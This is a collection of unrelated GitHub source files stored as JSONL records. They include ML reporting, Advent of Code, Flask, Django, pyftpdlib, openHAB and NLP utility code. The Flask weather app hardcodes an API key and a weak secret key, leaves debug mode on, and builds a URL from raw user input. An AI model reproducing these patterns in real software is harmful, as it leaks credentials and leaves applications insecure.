open(config[\"path\"][\"report\"], \"w\") as report_file:\n report_file.write(\"# Model Report\\n\\n\")\n report_file.write(\"## Model Pipeline Description\\n\\n\")\n for key, value in model.named_steps.items():\n report_file.write(f\"* **{key}:** {value}\\n\")\n report_file.write(\"\\n\")\n report_file.write(\"## Metrics\\n\\n\")\n report_template = Template(config[\"report_template\"])\n report_updated = report_template.substitute(\n train_score=f\"{train_score:.5f}\",\n test_score=f\"{test_score:.5f}\",\n validation_score=f\"{validation_score:.5f}\",\n )\n report_file.write(r\"{}\".format(report_updated))\n\n\ndef get_model_performance(y_real: pd.Series, y_pred: pd.Series):\n config = get_config()\n fig, ax = plt.subplots()\n fig.set_figheight(8)\n fig.set_figwidth(8)\n sns.regplot(x=y_pred, y=y_real, ax=ax)\n ax.set_xlabel(\"Predicted worldwide gross\")\n ax.set_ylabel(\"Real world wide gross\")\n ax.set_title(\"Behaviour of model performance\")\n fig.savefig(config[\"path\"][\"image_behaviour\"])\n","repo_name":"nelsoncardenas/intro-deployment-ml-model","sub_path":"src/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71460508328","text":"def runFirst(input):\n numbers = {}\n for line in input:\n number = int(line)\n target = 2020 - number\n if (target in numbers):\n return target * number\n numbers[number] = 1\n\ndef runSecond(input):\n numbers = {}\n for line in input:\n num1 = int(line)\n\n for num2 in numbers:\n target = 2020 - num1 - num2\n if (target in numbers):\n return target * num1 * num2\n numbers[num1] = 1\n\n\ndef main():\n with open(\"input.txt\", \"r\") as file:\n input = file.readlines()\n \n result = runFirst(input)\n print(result)\n \n result = runSecond(input)\n print(result)\n\nif (__name__ == \"__main__\"):\n main()","repo_name":"Nesquick0/Adventofcode","sub_path":"2020/01/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7514704684","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom setuptools import setup, find_packages\nfrom holiday import (\n __version__,\n __license__,\n __author__,\n __author_email__,\n)\n\n__name__ = 'holiday'\n__url__ = 'https://github.com/wanshot/holiday'\n\n__short_description__ = __name__ + ' is a package to generate holiday.'\n__long_description__ = open('./README.rst', 'r').read()\n\n__classifiers__ = [\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Development Status :: 5 - Production/Stable',\n 'Topic :: Software Development',\n 'Programming Language :: Python :: 2',\n]\n\n__keywords__ = [\n 'datetime',\n 'date',\n 'time',\n 'calendar',\n]\n\nsetup(\n name=__name__,\n version=__version__,\n description=__short_description__,\n long_description=__long_description__,\n url=__url__,\n author=__author__,\n author_email=__author_email__,\n classifiers=__classifiers__,\n keywords=' ,'.join(__keywords__),\n license=__license__,\n packages=find_packages(exclude=['tests']),\n)\n","repo_name":"wanshot/holiday","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5087213649","text":"import requests\r\nfrom flask import Flask, render_template, request, redirect, url_for, flash\r\nfrom flask_sqlalchemy import SQLAlchemy \r\nfrom bs4 import BeautifulSoup\r\n\r\napp = Flask(__name__)\r\napp.config['DEBUG'] = True\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///weather.db'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\napp.config['SECRET_KEY'] = 'thisisasecret'\r\n\r\ndb = SQLAlchemy(app)\r\n\r\nclass City(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n name = db.Column(db.String(50), nullable=False)\r\n\r\ndef get_weather_data(city):\r\n url = f'http://api.openweathermap.org/data/2.5/weather?q={ city }&units=imperial&appid=271d1234d3f497eed5b1d80a07b3fcd1'\r\n r = requests.get(url).json()\r\n return r\r\n\r\n@app.route('/')\r\ndef index_get():\r\n cities = City.query.all()\r\n\r\n weather_data = []\r\n\r\n for city in cities:\r\n\r\n r = get_weather_data(city.name)\r\n print(r)\r\n\r\n weather = {\r\n 'city' : city.name,\r\n 'temperature' : r['main']['temp'],\r\n 'description' : r['weather'][0]['description'],\r\n 'icon' : r['weather'][0]['icon'],\r\n }\r\n\r\n weather_data.append(weather)\r\n\r\n\r\n return render_template('weather.html', weather_data=weather_data)\r\n\r\n@app.route('/', methods=['POST'])\r\ndef index_post():\r\n err_msg = ''\r\n new_city = request.form.get('city')\r\n\r\n city = request.form.get('city')\r\n url_new = \"https://www.wunderground.com/weather/in/\"+city+\"\"\r\n rr = requests.get(url_new)\r\n data = rr.content\r\n soup = BeautifulSoup(data, 'html.parser')\r\n deg = soup.find_all('span',class_=\"wu-value wu-value-to\")[0].get_text()\r\n \r\n print(\"\\n\\n\\n\\nWEATHER REPORT FROM WUNDERGROUND.COM\")\r\n print(\"\\nTHE CURRENT WEATHER OF \"+city+ \" IS: \"+deg+\"°F\\n\\n\\n\\n\")\r\n \r\n if new_city:\r\n existing_city = City.query.filter_by(name=new_city).first()\r\n\r\n if not existing_city:\r\n new_city_data = get_weather_data(new_city)\r\n\r\n if new_city_data['cod'] == 200:\r\n new_city_obj = City(name=new_city)\r\n\r\n db.session.add(new_city_obj)\r\n db.session.commit()\r\n else:\r\n err_msg = 'City does not exist in the world!'\r\n else:\r\n err_msg = 'City already exists in the database!'\r\n\r\n if err_msg:\r\n flash(err_msg, 'error')\r\n else:\r\n flash('City added succesfully!')\r\n\r\n return redirect(url_for('index_get'))\r\n\r\n@app.route('/delete/')\r\ndef delete_city(name):\r\n city = City.query.filter_by(name=name).first()\r\n db.session.delete(city)\r\n db.session.commit()\r\n\r\n flash(f'Successfully deleted { city.name }', 'success')\r\n return redirect(url_for('index_get'))","repo_name":"Sumesh42/weather-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10383094658","text":"import logging\nimport sys\nimport time\ntry:\n import curses\nexcept ImportError:\n curses = None\n\nfrom pyftpdlib._compat import unicode\n\n\n# default logger\nlogger = logging.getLogger('pyftpdlib')\n\n\ndef _stderr_supports_color():\n color = False\n if curses is not None and sys.stderr.isatty():\n try:\n curses.setupterm()\n if curses.tigetnum(\"colors\") > 0:\n color = True\n except Exception:\n pass\n return color\n\n# configurable options\nLEVEL = logging.INFO\nPREFIX = '[%(levelname)1.1s %(asctime)s]'\nCOLOURED = _stderr_supports_color()\nTIME_FORMAT = \"%y-%m-%d %H:%M:%S\"\n\n\n# taken and adapted from Tornado\nclass LogFormatter(logging.Formatter):\n \"\"\"Log formatter used in pyftpdlib.\n Key features of this formatter are:\n\n * Color support when logging to a terminal that supports it.\n * Timestamps on every log line.\n * Robust against str/bytes encoding problems.\n \"\"\"\n def __init__(self, *args, **kwargs):\n logging.Formatter.__init__(self, *args, **kwargs)\n self._coloured = COLOURED and _stderr_supports_color()\n if self._coloured:\n curses.setupterm()\n # The curses module has some str/bytes confusion in\n # python3. Until version 3.2.3, most methods return\n # bytes, but only accept strings. In addition, we want to\n # output these strings with the logging module, which\n # works with unicode strings. The explicit calls to\n # unicode() below are harmless in python2 but will do the\n # right conversion in python 3.\n fg_color = (curses.tigetstr(\"setaf\") or curses.tigetstr(\"setf\")\n or \"\")\n if (3, 0) < sys.version_info < (3, 2, 3):\n fg_color = unicode(fg_color, \"ascii\")\n self._colors = {\n # blues\n logging.DEBUG: unicode(curses.tparm(fg_color, 4), \"ascii\"),\n # green\n logging.INFO: unicode(curses.tparm(fg_color, 2), \"ascii\"),\n # yellow\n logging.WARNING: unicode(curses.tparm(fg_color, 3), \"ascii\"),\n # red\n logging.ERROR: unicode(curses.tparm(fg_color, 1), \"ascii\")\n }\n self._normal = unicode(curses.tigetstr(\"sgr0\"), \"ascii\")\n\n def format(self, record):\n try:\n record.message = record.getMessage()\n except Exception:\n err = sys.exc_info()[1]\n record.message = \"Bad message (%r): %r\" % (err, record.__dict__)\n\n record.asctime = time.strftime(TIME_FORMAT,\n self.converter(record.created))\n prefix = PREFIX % record.__dict__\n if self._coloured:\n prefix = (self._colors.get(record.levelno, self._normal) +\n prefix + self._normal)\n\n # Encoding notes: The logging module prefers to work with character\n # strings, but only enforces that log messages are instances of\n # basestring. In python 2, non-ascii bytestrings will make\n # their way through the logging framework until they blow up with\n # an unhelpful decoding error (with this formatter it happens\n # when we attach the prefix, but there are other opportunities for\n # exceptions further along in the framework).\n #\n # If a byte string makes it this far, convert it to unicode to\n # ensure it will make it out to the logs. Use repr() as a fallback\n # to ensure that all byte strings can be converted successfully,\n # but don't do it by default so we don't add extra quotes to ascii\n # bytestrings. This is a bit of a hacky place to do this, but\n # it's worth it since the encoding errors that would otherwise\n # result are so useless (and tornado is fond of using utf8-encoded\n # byte strings wherever possible).\n try:\n message = unicode(record.message)\n except UnicodeDecodeError:\n message = repr(record.message)\n\n formatted = prefix + \" \" + message\n if record.exc_info:\n if not record.exc_text:\n record.exc_text = self.formatException(record.exc_info)\n if record.exc_text:\n formatted = formatted.rstrip() + \"\\n\" + record.exc_text\n return formatted.replace(\"\\n\", \"\\n \")\n\n\ndef _config_logging():\n channel = logging.StreamHandler()\n channel.setFormatter(LogFormatter())\n logger = logging.getLogger('pyftpdlib')\n logger.setLevel(LEVEL)\n logger.addHandler(channel)\n","repo_name":"timburgess/brackets-ftp-sync","sub_path":"src/node/node_modules/jsftp/node_modules/ftp-test-server/pyftpdlib/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"53"} +{"seq_id":"13253991848","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n#from heros_vs_villains.supers.serializers import SuperSerializer\nfrom .serializers import SuperSerializer\nfrom .models import Supers\nfrom supers import serializers\nfrom super_types.models import SuperType\n\n\n@api_view(['GET','POST'])\ndef supers_list(request):\n \n if request.method == 'GET':\n \n type_param = request.query_params.get('type')\n\n supers = Supers.objects.all()\n\n if type_param:\n supers = supers.filter(super_type_id__type=type_param)\n\n\n\n super_types = SuperType.objects.all()\n\n custom_response_dictionary = {}\n\n for super_type in super_types:\n\n supers = Supers.objects.filter(super_type_id = super_type.id)\n \n super_serializer = SuperSerializer(supers, many=True)\n\n custom_response_dictionary[super_type.type] = super_serializer.data\n \n\n\n\n # super_serializer = SuperSerializer(supers, many=True)\n\n # return Response(serializer.data)\n\n # super_types = SuperType.objects.all()\n\n # custom_response_dictionary = {}\n \n # for super in supers:\n # supers = Supers.objects.filter(super_type_id = super.super_type_id)\n\n # serializer = SuperSerializer(supers, many=True)\n\n # custom_response_dictionary[super.name] = {\n # \"type\": super_serializer.data\n # }\n return Response(custom_response_dictionary)\n\n elif request.method == 'POST':\n serializer = SuperSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n \n\n@api_view(['GET','PUT','DELETE'])\ndef supers_details(request, pk):\n super = get_object_or_404(Supers, pk=pk)\n if request.method == 'GET':\n serializer = SuperSerializer(super)\n return Response(serializer.data)\n elif request.method == 'PUT':\n serializer = SuperSerializer(super, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n elif request.method == 'DELETE':\n super.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"ctaylor0002/Heros-vs-Villains","sub_path":"heros_vs_villains/supers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27878706714","text":"import pandas as pd\nimport regex as re\nimport os\n\ntimeframe = '15min'\n\ndef transform(df):\n df.index = pd.DatetimeIndex(df['datetime'])\n df['tweet_count'] = df['datetime']\n order = df.columns\n return df.resample(timeframe).agg({'datetime': 'first', 'followers': 'sum', 'compound_sum': 'sum', 'compound_mean': 'mean', 'followers_compound': 'sum', 'positive_sum': 'sum', 'positive_mean': 'mean', 'followers_positive': 'sum', 'neutral_sum': 'sum', 'neutral_mean': 'mean', 'followers_neutral': 'sum', 'negative_sum': 'sum', 'negative_mean': 'mean', 'followers_negative': 'sum', 'tweet_count': 'count'})[order]\n\ninput_filename = \"data/interim/live_tweets_expanded.csv\"\noutput_filename = \"data/interim/live_tweets_aggregated_\"+ timeframe +\".csv\"\ncolumns = ['datetime', 'followers', 'compound_sum', 'compound_mean', 'followers_compound', 'positive_sum', 'positive_mean', 'followers_positive', 'neutral_sum', 'neutral_mean', 'followers_neutral', 'negative_sum', 'negative_mean', 'followers_negative']\n\ndef save(data):\n data.to_csv(output_filename, header='column_names', index=False)\n\ndata = pd.read_csv(input_filename, usecols=columns)\ndata = transform(data)\nsave(data)","repo_name":"gorilazish/crypto-predict","sub_path":"src/features/aggregate_tweets.py","file_name":"aggregate_tweets.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"662507931","text":"import re\nimport torch\nfrom sklearn.model_selection import train_test_split\nimport json\nfrom nltk.corpus import wordnet\n\ndef span_to_span_idx(span):\n '''Turn s string span into a span idx of the whole context\n @param span:\n str: a span str from the doc e.g. 'word_5..word_7'\n @return:\n list: a min max span e.g. [4, 6]\n '''\n span = re.findall(r'\\d+', span)\n # Because span: in AR & VZ: 'word_5..word_5', but in IS: 'word_5'\n if len(span) < 2:\n span_idx = [int(span[0])-1, int(span[0])]\n else:\n span_idx = [int(span[0])-1, int(span[1])]\n return span_idx\n\ndef span_idx_to_str_slice(left:int, right:int):\n '''Convert span idx to a slice in string\n e.g. (1, 2) => '[1:2]'\n @param left: start index\n @param right: end index\n @return: a slice in string\n '''\n return '[' + str(left) + ':' + str(right) + ']'\n\ndef to_cuda(x):\n \"\"\" GPU-enable a tensor \"\"\"\n if torch.cuda.is_available():\n x = x.cuda()\n return x\n\ndef batch(iterable, batch_size=1):\n length = len(iterable)\n for ndx in range(0, length, batch_size):\n yield iterable[ndx:min(ndx + batch_size, length)]\n\ndef split_train_set(X):\n '''Splot the dataset into training, validation and test sets\n @param X:\n @param y:\n @return:\n '''\n # SORTED\n X.sort(key=lambda x: x.file_name, reverse=False)\n y = get_all_gold_labels(X)\n # STAY SORTED\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=None, shuffle=False)\n # print([x.file_name for x in X_train])\n # print(X_train, y_train, X_test,y_test)\n return X_train, y_train, X_test,y_test\n\ndef assign_label(sigmoid_score):\n ''' All the score <= 0.5 will be assigned to 0 and > 0.5 will be assigned to 1.\n @param sigmoid_score: Tensor\n @return: int: 1 or 0\n '''\n score = float(sigmoid_score)\n if score > 0.5:\n return 1\n else:\n return 0\n\ndef get_all_gold_labels(corpus):\n '''Get all gold labels of the whole corpus(all the anaphors)\n @param corpus: a list of all the anaphor objects\n @return: a list of gold labels of the whole corpus(all the anaphors)\n '''\n corpus_labels = []\n for ana in corpus:\n # find out the gold label and the coreferences of this anaphor\n ana_gold_and_corefs = ana.golds_ids # AS CORRECT: GOLD LABEL AND ITS COREFERENCES\n # if the anaphor has corefs\n\n potentials_selfs_and_corefs = [p.coref_id for p in ana.potential_antecedents] # list of lists\n\n # PRODUCE BINARY LABEL for every anaphor(the whole corpus)\n potentials_labels_per_ana = []\n for p_self_and_corefs in potentials_selfs_and_corefs:\n # if any p_corefs same as any ana_corefs_ids\n if any(x in p_self_and_corefs for x in ana_gold_and_corefs):\n potentials_labels_per_ana.append(1)\n else:\n potentials_labels_per_ana.append(0)\n corpus_labels.append(potentials_labels_per_ana)\n\n return corpus_labels\n\n\ndef my_3d_concat(t1, t2):\n ''' Concatenate 2 3d tensors(beause tensor cant do it due to size problem)\n @param l1: torch.tensor\n @param l2: torch.tensor\n @return: a concatenation of the 2 tensors\n '''\n all = []\n for a1, b1 in zip(t1, t2):\n # print(a1, b1)\n all.append(torch.cat([a1, b1], 1))\n return torch.stack(all)\n\ndef get_batch_distance_features_matrixs(docs):\n ''' get a batch of the distance features matrix of all the candidates of each anaphor\n @param docs: a list of anaphor objects\n @return: a list of a batch the distance features matrix of all the candidates of each anaphor\n '''\n return [ana['candidates_distance_features_matrix'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_grammar_features_matrixs(docs):\n ''' get a batch of the grammatical roles features matrix of all the candidates of each anaphor\n @param docs: a list of anaphor objects\n @return: a list of a batch the grammatical roles features matrix of all the candidates of each anaphor\n '''\n\n return [ana['candidates_deps_features_matrix'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_definiteness_features_matrixs(docs):\n ''' get a batch of the grammatical roles features matrix of all the candidates of each anaphor\n @param docs: a list of anaphor objects\n @return: a list of a batch the grammatical roles features matrix of all the candidates of each anaphor\n '''\n\n return [ana['candidates_definiteness_features_matrix'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_match_features_scores(docs):\n return [ana['candidates_string_match_features'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_synonym_features_scores(docs):\n return [ana['candidates_synonym_features'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_hypernym_features_scores(docs):\n return [ana['candidates_hypernym_features'] for ana in docs] # [ana[potentials]]\n\ndef remove_duplicantes_in_ontonotes():\n remove = 0\n\n ontonotes_df = pd.read_csv('/home/students/huang/Documents/corpus/ontonotes-5.0-conll-2012/preprocessed/ontonotes_retrieval.csv', sep='\\t', index_col=[0])\n print('original ontonotes: ', len(ontonotes_df))\n\n main_df = pd.read_csv('/home/students/huang/Documents/corpus/Dataset_comparative_anaphora_resolution/preprocessed/annotation_retrieval.csv', sep='\\t', index_col=[0])\n\n main_corpus_files_names = [row['file_name'].split('.')[0] for index, row in main_df.iterrows()]\n\n for index, row in ontonotes_df.iterrows():\n file_name = row['file_name'].split('.')[0]\n if file_name in main_corpus_files_names:\n remove += 1\n ontonotes_df.drop(index, inplace=True)\n\n\n print('main_corpus: ', len(main_df))\n print('ontonotes: ', len(ontonotes_df))\n print('removed: ', remove)\n\n save_to_path = '../../corpus/ontonotes-5.0-conll-2012/preprocessed/ontonotes_retrieval_no_dups.csv'\n ontonotes_df.to_csv(save_to_path, sep='\\t')\n\ndef load_corpus_list():\n with open(\"../k_folds_corpus/ontonotes/ontonotes___holdout_Xtrain_ytrain_Xval_yval_Xtest_ytest.txt\", 'r') as f:\n train_val_test_corpus = json.load(f)\n\n return train_val_test_corpus\n\n\ndef get_semantic_feature_definiteness(children_of_head):\n definite = [\"the\", \"all\", \"both\", \"either\", \"neither\", \"no\", \"none\"]\n indefinite = [\"a\", \"an\", \"each\", \"every\", \"some\", \"any,\" \"few\", \"several\", \"many\", \"much\", \"little\", \"most\", \"more\",\n \"fewer\", \"less\"]\n demonstrative = ['this', 'these', 'that', 'those']\n\n if any(x in definite for x in children_of_head):\n return 'definite'\n elif any(x in indefinite for x in children_of_head):\n return 'indefinite'\n elif any(x in demonstrative for x in children_of_head):\n return 'demonstrative'\n\n\ndef get_word_synonyms_from_sent(word, sent):\n word_synonyms = []\n for synset in wordnet.synsets(word):\n for lemma in synset.lemma_names():\n if lemma in sent and lemma != word:\n word_synonyms.append(lemma)\n return word_synonyms","repo_name":"jinhuang-de/BA-Resolving-comparative-anaphora-with-and-without-lexical-heads","sub_path":"src/ontonotes_utils.py","file_name":"ontonotes_utils.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39572661259","text":"import numpy as np\nfrom cola.ops import Diagonal\nfrom cola.linalg.tbd.slq import stochastic_lanczos_quad\nfrom cola.fns import lazify\nfrom cola.utils.test_utils import get_xnp, parametrize, relative_error\nfrom cola.backends import all_backends\nfrom cola.utils.test_utils import generate_spectrum, generate_pd_from_diag\n\n\n# @parametrize(tracing_backends)\n@parametrize(['torch'])\ndef test_slq_vjp(backend):\n xnp = get_xnp(backend)\n dtype = xnp.float32\n diag = xnp.Parameter(xnp.array([3., 4., 5.], dtype=dtype, device=None))\n diag_soln = xnp.Parameter(xnp.array([3., 4., 5.], dtype=dtype, device=None))\n _, unflatten = Diagonal(diag).flatten()\n\n def f(theta):\n A = unflatten([theta])\n loss = stochastic_lanczos_quad(A, xnp.log, vtol=1 / 10, max_iters=100, tol=1e-6, pbar=False)\n return loss\n\n def f_alt(theta):\n X = xnp.diag(theta)\n loss = xnp.logdet(X)\n return loss\n\n out = f(diag)\n if backend == 'torch':\n out.backward()\n approx = diag.grad.clone()\n else:\n approx = xnp.grad(f)(diag)\n assert approx is not None\n\n out = f_alt(diag_soln)\n if backend == 'torch':\n out.backward()\n soln = diag_soln.grad.clone()\n else:\n soln = xnp.grad(f_alt)(diag)\n\n rel_error = relative_error(soln, approx)\n assert rel_error < 1e-1\n\n\n@parametrize(all_backends)\ndef test_stochastic_lanczos_quad_random(backend):\n xnp = get_xnp(backend)\n dtype = xnp.float32\n diag = generate_spectrum(coeff=0.5, scale=1.0, size=10, dtype=np.float32)\n A = xnp.array(generate_pd_from_diag(diag, dtype=diag.dtype), dtype=dtype, device=None)\n\n def fun(x):\n return xnp.log(x)\n\n soln = xnp.sum(fun(xnp.array(diag, dtype=dtype, device=None)))\n vtol, max_iters, tol = 1 / np.sqrt(70), A.shape[0], 1e-7\n B = lazify(A)\n approx = stochastic_lanczos_quad(B, fun, max_iters=max_iters, tol=tol, vtol=vtol)\n\n rel_error = relative_error(soln, approx)\n assert rel_error < 1e-1\n","repo_name":"wilson-labs/cola","sub_path":"tests/algorithms/test_stochastic_lanczos_quad.py","file_name":"test_stochastic_lanczos_quad.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":233,"dataset":"github-code","pt":"53"} +{"seq_id":"24345789831","text":"\"\"\"\nDevice/Hardware specific python classes\n\"\"\"\nfrom typing import List\nimport abc\nfrom openhab_ds import *\nfrom configs import get_esphome_openhab_config, get_device_configs\n\n\n# ######### Some global objects################\non_command = ChannelCommand('on', 'ON')\noff_command = ChannelCommand('off', 'OFF')\n\n\nclass RootDev(object):\n def __init__(self, device: dict):\n self.device_data = device\n self.name = device.get('name')\n # Below will be updated in derived class\n self.thing_id = None\n self.items_dict: List[dict] = None\n\n @abc.abstractmethod\n def create_thing(self) -> OHThingBase:\n pass\n\n @abc.abstractmethod\n def get_thing(self) -> OHThingBase:\n pass\n\n @abc.abstractmethod\n def create_items(self) -> List[OHItem]:\n pass\n\n\nclass MqttDev(RootDev):\n def __init__(self, mqtt_bridge: OHMqttBridge, device: dict, dev_type: str):\n super(MqttDev, self).__init__(device)\n self.mqtt_bridge = mqtt_bridge\n self.channels: List[OHChannel] = None\n self.thing_id = device['id']\n self.dev_type = dev_type\n self.groups = device.get('groups', [])\n self.items_dict = device.get('items', [])\n self.thing: OHMqttThings = self.create_thing()\n\n def create_thing(self) -> OHThingBase:\n device = self.device_data\n device_config = get_device_configs()\n bridge = self.mqtt_bridge\n if not bridge:\n print('[things] Error: mqtt_broker configuration is required for mqtt devices.',\n f'mqtt is used for {device[\"name\"]} ({device[\"id\"]}).')\n raise ValueError('mqtt configuration missing')\n\n # check inside bridge if this device is already added\n for thing in bridge.get_things():\n if thing.get_thing_id() == device['id']:\n return thing\n\n thing = OHMqttThings(device['id'], device['name'])\n channels = self.create_channels(device['id'], device_config[self.dev_type])\n thing.add_channels(channels)\n bridge.add_thing(thing)\n # add thing reference to channels\n list(map(lambda x: x.add_thing(thing), channels))\n # add bridge reference to thing\n thing.add_bridge(bridge)\n\n self.channels = channels\n return thing\n\n def get_thing(self) -> OHThingBase:\n # for mqtt device bridge will have all the things\n return self.mqtt_bridge\n\n def create_channels(self, dev_id: str, dev_config: dict) -> List[OHChannel]:\n channels = []\n esphab_config = get_esphome_openhab_config()\n\n for entity in dev_config:\n channel_type = self.get_channel_type(entity, esphab_config)\n\n # entity is having child members (Ex- wifi_signal, touch_key0, relay_0 etc.)\n children = dev_config[entity]\n if not children:\n # entity which is not having any member (Ex- status, debug)\n children = [entity]\n\n # if entity is 'light', change the format\n if entity == 'light':\n children = list(map(lambda x: x['id'], children))\n\n for entity_child in children:\n channel_name = f'ch_{entity_child}_{dev_id}'\n channel = OHChannel(channel_type, channel_name, entity_child)\n commands = self.get_channel_commands(entity, esphab_config, dev_id, entity_child)\n channel.add_commands(commands)\n channels.append(channel)\n # end inner for\n # end for\n\n return channels\n\n def get_channel_commands(self, entity: str, esphab_config: dict, device_id: str, entity_child: str = '') \\\n -> List[ChannelCommand]:\n # supported openhab commands, ex- stateTopic, commandTopic\n command_oh = esphab_config['openhab_ch'][entity]['channels']\n # mqtt topics defined for entity type, ex- state, command\n topics = esphab_config['esphome'][entity]\n no_child_topic_flag = False\n if not topics:\n topics = [x for x in range(len(command_oh))] # No special topic for entities like status and debug.\n no_child_topic_flag = True\n\n commands = []\n for topic in topics:\n if no_child_topic_flag and entity != entity_child:\n mqtt_topic = f'{device_id}/{entity}/{entity_child}'\n elif no_child_topic_flag:\n mqtt_topic = f'{device_id}/{entity}'\n else:\n mqtt_topic = f'{device_id}/{entity}/{entity_child}/{topic}'\n command = ChannelCommand(command_oh[topic], mqtt_topic)\n commands.append(command)\n\n # add the ON and OFF in case of switch\n if entity == 'switch':\n commands.append(on_command)\n commands.append(off_command)\n\n return commands\n\n def get_channel_type(self, entity: str, esphab_config: dict) -> str:\n channel_type = 'String'\n if entity in esphab_config['openhab_ch']:\n channel_type = esphab_config['openhab_ch'][entity]['datatype']\n return channel_type\n\n def create_items(self) -> List[OHItem]:\n if 'items' not in self.device_data:\n print('[items] No items found for device', self.device_data['name'])\n return []\n\n all_items = []\n for item_data in self.device_data['items']:\n if isinstance(item_data, str):\n # raw item\n item = OHItem(raw_item=item_data)\n all_items.append(item)\n elif 'item_type' in item_data:\n channel = self.get_channel(item_data['id'])\n created_items = self.create_item(item_data, self.groups, channel)\n all_items.extend(created_items)\n return all_items\n\n def get_channel(self, item_id: str) -> OHChannel:\n channel = next(filter(lambda x: x.get_entity_name() == item_id, self.thing.get_channels()), None)\n if not channel:\n raise ValueError(f'[items] device_config.yaml is not having \\'{item_id}\\' for device \\'{self.thing_id}\\'.')\n return channel\n\n def create_item(self, item_data: dict, parent_groups: List[str], channel: OHChannel) -> List[OHItem]:\n item_name = f'{item_data[\"id\"]}_{self.thing_id}'\n item = OHItem(name=item_name, **item_data)\n item.add_groups(parent_groups)\n item.set_device_id(self.thing_id)\n\n created_items = [item]\n # create updater items (for lights or any other)\n if 'update_mode' in item_data:\n # add group in last created item (this group will take input from UI)\n item.add_group(item_data['update_mode'])\n\n # additional item\n item_name = item_data['update_mode'] + '_' + item_name\n item = OHItem(name=item_name, main_ui='no')\n item.add_groups(parent_groups)\n item.add_group('esp_' + item_data['update_mode']) # this group will receive input from esp and update UI\n if 'groups' in item_data:\n item.add_groups(item_data['groups'])\n created_items.append(item)\n\n # add the channel in target item\n item.add_channel(channel)\n\n return created_items\n\n\nclass EspHomeDev(MqttDev):\n def __init__(self, mqtt_bridge: OHMqttBridge, device: dict):\n super(EspHomeDev, self).__init__(mqtt_bridge, device)\n\n\nclass WledDev(RootDev):\n def __init__(self, device: dict, dev_type: str):\n super(WledDev, self).__init__(device)\n self.thing_id = self.get_wled_thing_id(device['id'])\n self.dev_type = dev_type\n self.thing = self.create_thing()\n self.groups = device.get('groups', [])\n\n def create_thing(self) -> OHThingBase:\n device = self.device_data\n thing = OHWledThing(thing_id=self.thing_id, label=device['name'], address=device['id'])\n return thing\n\n def get_thing(self) -> OHThingBase:\n return self.thing\n\n @staticmethod\n def get_wled_thing_id(dev_id: str) -> str:\n thing_id = 'wled_' + dev_id\n thing_id = thing_id.replace('.', '')\n return thing_id\n\n def create_items(self) -> List[OHItem]:\n device_config = get_device_configs()\n self.items_dict = self.device_data.get('items') or device_config[self.dev_type]['items']\n\n all_items = []\n for item_data in device_config[self.dev_type]['items']:\n if 'item_type' not in item_data:\n continue\n item = self.create_item(item_data, self.groups)\n all_items.append(item)\n\n return all_items\n\n def create_item(self, item_data: dict, parent_groups: List[str]) -> OHItem:\n item_name = f'{item_data[\"id\"]}_{self.thing_id}'\n item = OHItem(name=item_name, **item_data)\n item.add_groups(parent_groups)\n item.set_device_id(self.thing_id)\n\n channel = OHChannel(name=item_data['id'], ch_type=item_data['item_type'], entity_name=item_data['label'])\n channel.add_thing(self.thing)\n item.add_channel(channel)\n return item\n","repo_name":"shaeed/openhab_config","sub_path":"python_module/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":9052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38944193932","text":"\"\"\"\r\nLa nuova versione 3.9.0 di python integra grazie all'installazione\r\ndi un modulo (tzdata) che introduce il supporto all'IANA time zone database.\r\nQuesto nuovo modulo permette di accedere alle date e agli orari di un determinato\r\nluogo tramite dei semplici comandi.\r\n\"\"\"\r\n\r\n#pip install tzdata\r\nimport time\r\nfrom zoneinfo import ZoneInfo\r\nfrom datetime import datetime\r\n\r\n#Funzione di formattazzione\r\ndef datetime_formatter(current_time):\r\n return current_time.strftime(\"%d-%m-%Y | %H:%M\")\r\n\r\n#Oraio attuale\r\ncurrent_time = datetime.now()\r\n\r\n#Viene chiamata la funzione di formattazione passando l'ora attuale\r\nitalian_format_datetime = datetime_formatter(current_time)\r\nprint(\"Data e Orario senza 